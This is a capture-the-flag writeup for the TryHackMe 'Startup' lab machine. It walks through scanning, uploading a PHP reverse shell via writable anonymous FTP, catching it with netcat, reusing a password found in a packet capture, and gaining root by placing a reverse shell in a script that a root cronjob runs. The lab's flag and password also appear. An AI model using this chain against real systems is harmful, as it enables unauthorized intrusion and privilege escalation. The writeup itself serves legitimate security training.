mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-24 13:03:01 +00:00
260 lines
8.6 KiB
Markdown
260 lines
8.6 KiB
Markdown
|
# TryHackMe-Startup
|
||
|
|
||
|
## NMAP
|
||
|
|
||
|
```
|
||
|
Nmap scan report for 10.10.126.211
|
||
|
Host is up (0.15s latency).
|
||
|
Not shown: 997 closed ports
|
||
|
PORT STATE SERVICE VERSION
|
||
|
21/tcp open ftp vsftpd 3.0.3
|
||
|
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|
||
|
| drwxrwxrwx 2 65534 65534 4096 Nov 09 02:12 ftp [NSE: writeable]
|
||
|
|_-rw-r--r-- 1 0 0 208 Nov 09 02:12 notice.txt
|
||
|
| ftp-syst:
|
||
|
| STAT:
|
||
|
| FTP server status:
|
||
|
| Connected to 10.14.3.143
|
||
|
| Logged in as ftp
|
||
|
| TYPE: ASCII
|
||
|
| No session bandwidth limit
|
||
|
| Session timeout in seconds is 300
|
||
|
| Control connection is plain text
|
||
|
| Data connections will be plain text
|
||
|
| At session startup, client count was 3
|
||
|
| vsFTPd 3.0.3 - secure, fast, stable
|
||
|
|_End of status
|
||
|
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
|
||
|
| ssh-hostkey:
|
||
|
| 2048 42:67:c9:25:f8:04:62:85:4c:00:c0:95:95:62:97:cf (RSA)
|
||
|
| 256 dd:97:11:35:74:2c:dd:e3:c1:75:26:b1:df:eb:a4:82 (ECDSA)
|
||
|
|_ 256 27:72:6c:e1:2a:a5:5b:d2:6a:69:ca:f9:b9:82:2c:b9 (ED25519)
|
||
|
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|
||
|
|_http-server-header: Apache/2.4.18 (Ubuntu)
|
||
|
|_http-title: Maintenance
|
||
|
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
|
||
|
|
||
|
```
|
||
|
|
||
|
|
||
|
## PORT 80
|
||
|
|
||
|
<img src="https://imgur.com/BeyLjt9.png"/>
|
||
|
|
||
|
|
||
|
|
||
|
## Gobuster
|
||
|
|
||
|
```
|
||
|
root@kali:~/TryHackMe/Easy/Startup# gobuster dir -u http://10.10.126.211/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 16
|
||
|
===============================================================
|
||
|
Gobuster v3.0.1
|
||
|
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
|
||
|
===============================================================
|
||
|
[+] Url: http://10.10.126.211/
|
||
|
[+] Threads: 16
|
||
|
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
|
||
|
[+] Status codes: 200,204,301,302,307,401,403
|
||
|
[+] User Agent: gobuster/3.0.1
|
||
|
[+] Timeout: 10s
|
||
|
===============================================================
|
||
|
2020/11/09 21:02:55 Starting gobuster
|
||
|
===============================================================
|
||
|
/files (Status: 301)
|
||
|
|
||
|
```
|
||
|
Visting `/files`
|
||
|
|
||
|
<img src="https://imgur.com/9QKO9K2.png"/>
|
||
|
|
||
|
We found `notice.txt`
|
||
|
|
||
|
```
|
||
|
Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our website will think we are a joke! Now I dont know who it is, but Maya is looking pretty sus.
|
||
|
```
|
||
|
Here `maya` might be a username
|
||
|
|
||
|
There wasn't anything in the `ftp` directory
|
||
|
|
||
|
## PORT 21 (FTP)
|
||
|
|
||
|
<img src="https://imgur.com/qRHvzXL.png"/>
|
||
|
|
||
|
Here we find a hidden log file `.test.log`
|
||
|
|
||
|
But we see something interesting when looking at `ftp` directory
|
||
|
|
||
|
```
|
||
|
drwxrwxrwx 2 65534 65534 4096 Nov 09 02:12 ftp
|
||
|
```
|
||
|
|
||
|
We can read and write files on that directory
|
||
|
|
||
|
So I tried to upload php reverse shell and it did get uploaded
|
||
|
|
||
|
```
|
||
|
ftp> put shell.php
|
||
|
local: shell.php remote: shell.php
|
||
|
200 PORT command successful. Consider using PASV.
|
||
|
150 Ok to send data.
|
||
|
226 Transfer complete.
|
||
|
5493 bytes sent in 0.00 secs (36.6331 MB/s)
|
||
|
ftp>
|
||
|
```
|
||
|
|
||
|
Now let's go back to `/files/ftp`
|
||
|
|
||
|
<img src="https://imgur.com/rXdAZqu.png"/>
|
||
|
|
||
|
And then listen for the port you setup in that reverse shell and we'll get it
|
||
|
```
|
||
|
Croot@kali:~/TryHackMe/Easy/Startup# nc -lvp 6666
|
||
|
listening on [any] 6666 ...
|
||
|
10.10.126.211: inverse host lookup failed: Unknown host
|
||
|
connect to [10.14.3.143] from (UNKNOWN) [10.10.126.211] 58662
|
||
|
Linux startup 4.4.0-190-generic #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
|
||
|
16:32:06 up 38 min, 0 users, load average: 0.00, 0.00, 0.00
|
||
|
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
|
||
|
uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
||
|
/bin/sh: 0: can't access tty; job control turned off
|
||
|
$ whoami
|
||
|
www-data
|
||
|
```
|
||
|
|
||
|
```
|
||
|
rwxr-xr-x 26 root root 4096 Nov 9 15:54 .
|
||
|
drwxr-xr-x 26 root root 4096 Nov 9 15:54 ..
|
||
|
drwxr-xr-x 2 root root 4096 Sep 25 08:12 bin
|
||
|
drwxr-xr-x 3 root root 4096 Sep 25 08:12 boot
|
||
|
drwxr-xr-x 2 root root 4096 Nov 9 02:10 data
|
||
|
drwxr-xr-x 16 root root 3560 Nov 9 15:53 dev
|
||
|
drwxr-xr-x 96 root root 4096 Nov 9 02:33 etc
|
||
|
drwxr-xr-x 3 root root 4096 Nov 9 02:15 home
|
||
|
drwxr-xr-x 2 www-data www-data 4096 Nov 9 02:12 incidents
|
||
|
lrwxrwxrwx 1 root root 33 Sep 25 08:12 initrd.img -> boot/initrd.img-4.4.0-190-generic
|
||
|
lrwxrwxrwx 1 root root 33 Sep 25 08:12 initrd.img.old -> boot/initrd.img-4.4.0-190-generic
|
||
|
drwxr-xr-x 22 root root 4096 Sep 25 08:22 lib
|
||
|
drwxr-xr-x 2 root root 4096 Sep 25 08:10 lib64
|
||
|
drwx------ 2 root root 16384 Sep 25 08:12 lost+found
|
||
|
drwxr-xr-x 2 root root 4096 Sep 25 08:09 media
|
||
|
drwxr-xr-x 2 root root 4096 Sep 25 08:09 mnt
|
||
|
drwxr-xr-x 2 root root 4096 Sep 25 08:09 opt
|
||
|
dr-xr-xr-x 126 root root 0 Nov 9 15:53 proc
|
||
|
-rw-r--r-- 1 www-data www-data 136 Nov 9 02:12 recipe.txt
|
||
|
drwx------ 4 root root 4096 Nov 9 02:15 root
|
||
|
drwxr-xr-x 25 root root 900 Nov 9 16:26 run
|
||
|
drwxr-xr-x 2 root root 4096 Sep 25 08:22 sbin
|
||
|
drwxr-xr-x 2 root root 4096 Nov 9 02:10 snap
|
||
|
drwxr-xr-x 3 root root 4096 Nov 9 02:11 srv
|
||
|
dr-xr-xr-x 13 root root 0 Nov 9 16:33 sys
|
||
|
drwxrwxrwt 7 root root 4096 Nov 9 16:35 tmp
|
||
|
drwxr-xr-x 10 root root 4096 Sep 25 08:09 usr
|
||
|
drwxr-xr-x 2 root root 4096 Nov 9 02:10 vagrant
|
||
|
drwxr-xr-x 14 root root 4096 Nov 9 02:11 var
|
||
|
lrwxrwxrwx 1 root root 30 Sep 25 08:12 vmlinuz -> boot/vmlinuz-4.4.0-190-generic
|
||
|
lrwxrwxrwx 1 root root 30 Sep 25 08:12 vmlinuz.old -> boot/vmlinuz-4.4.0-190-generic
|
||
|
|
||
|
```
|
||
|
|
||
|
Here we can find `recipe.txt` that tells the answer to `What is the secret spice soup recipe ?`
|
||
|
|
||
|
I ran `find` command to check what file can`www-data` is able to read
|
||
|
|
||
|
Running linpeas I found
|
||
|
|
||
|
<img src="https://imgur.com/sIRgo5c.png"/>
|
||
|
|
||
|
```
|
||
|
/vagrant
|
||
|
/incidents
|
||
|
/data
|
||
|
```
|
||
|
|
||
|
Are unexpected folders in system(/) directory
|
||
|
|
||
|
Going to `/incidents`
|
||
|
|
||
|
```
|
||
|
www-data@startup:/incidents$ ls -al
|
||
|
total 40
|
||
|
drwxr-xr-x 2 www-data www-data 4096 Nov 9 02:12 .
|
||
|
drwxr-xr-x 26 root root 4096 Nov 10 14:10 ..
|
||
|
-rwxr-xr-x 1 www-data www-data 31224 Nov 9 02:12 suspicious.pcapng
|
||
|
www-data@startup:/incidents$
|
||
|
|
||
|
```
|
||
|
<img src="https://imgur.com/Yw05Mqg.png"/>
|
||
|
|
||
|
I then followed `tcp stream`
|
||
|
|
||
|
<img src="https://imgur.com/gXm09BG.png"/>
|
||
|
|
||
|
Now this `c4ntg3t3n0ughsp1c3` password maybe for `lennie` or `vagrant`
|
||
|
|
||
|
```
|
||
|
www-data@startup:/incidents$ su lennie
|
||
|
Password:
|
||
|
lennie@startup:/incidents$
|
||
|
```
|
||
|
So we finally get to lower privileged user
|
||
|
|
||
|
|
||
|
### User Flag
|
||
|
|
||
|
```
|
||
|
lennie@startup:/incidents$ cd ~
|
||
|
lennie@startup:~$ ls -al
|
||
|
total 20
|
||
|
drwx------ 4 lennie lennie 4096 Nov 9 02:12 .
|
||
|
drwxr-xr-x 3 root root 4096 Nov 9 02:15 ..
|
||
|
drwxr-xr-x 2 lennie lennie 4096 Nov 9 02:12 Documents
|
||
|
drwxr-xr-x 2 root root 4096 Nov 9 02:13 scripts
|
||
|
-rw-r--r-- 1 lennie lennie 38 Nov 9 02:12 user.txt
|
||
|
lennie@startup:~$ cat user.txt
|
||
|
THM{03ce3d619b80ccbfb3b7fc81e46c0e79}
|
||
|
lennie@startup:~$
|
||
|
```
|
||
|
## Privilege Escalation
|
||
|
|
||
|
```
|
||
|
lennie@startup:~/scripts$ ls -al
|
||
|
total 16
|
||
|
drwxr-xr-x 2 root root 4096 Nov 9 02:13 .
|
||
|
drwx------ 4 lennie lennie 4096 Nov 9 02:12 ..
|
||
|
-rwxr-xr-x 1 root root 77 Nov 9 02:12 planner.sh
|
||
|
-rw-r--r-- 1 root root 1 Nov 10 14:45 startup_list.txt
|
||
|
lennie@startup:~/scripts$
|
||
|
```
|
||
|
We now can see in lennie's home directory there is `/srcipts` where we can do something with `planner.sh`. It seems we cannot edit that file so there is another script file that we can edit
|
||
|
|
||
|
```
|
||
|
lennie@startup:~/scripts$ ls -al
|
||
|
total 16
|
||
|
drwxr-xr-x 2 root root 4096 Nov 9 02:13 .
|
||
|
drwx------ 4 lennie lennie 4096 Nov 9 02:12 ..
|
||
|
-rwxr-xr-x 1 root root 77 Nov 9 02:12 planner.sh
|
||
|
-rw-r--r-- 1 root root 1 Nov 10 14:58 startup_list.txt
|
||
|
lennie@startup:~/scripts$ cat /etc/print.sh
|
||
|
#!/bin/bash
|
||
|
echo "Done!"
|
||
|
lennie@startup:~/scripts$ ls -al /etc/print.sh
|
||
|
-rwx------ 1 lennie lennie 25 Nov 9 02:12 /etc/print.sh
|
||
|
lennie@startup:~/scripts$ cat /etc/print.sh
|
||
|
#!/bin/bash
|
||
|
echo "Done!"
|
||
|
lennie@startup:~/scripts$
|
||
|
```
|
||
|
|
||
|
After adding a reverse bash shell don't just run the script because it would just give you a shell as `lennie` see starts listening and don't just run the script it would give a shell with in a minute.
|
||
|
|
||
|
<img src="https://imgur.com/IeUPwTh.png"/>
|
||
|
|
||
|
```
|
||
|
root@startup:~# crontab -l
|
||
|
crontab -l
|
||
|
* * * * * /home/lennie/scripts/planner.sh
|
||
|
root@startup:~#
|
||
|
```
|
||
|
As you can see it was a cronjob
|
||
|
|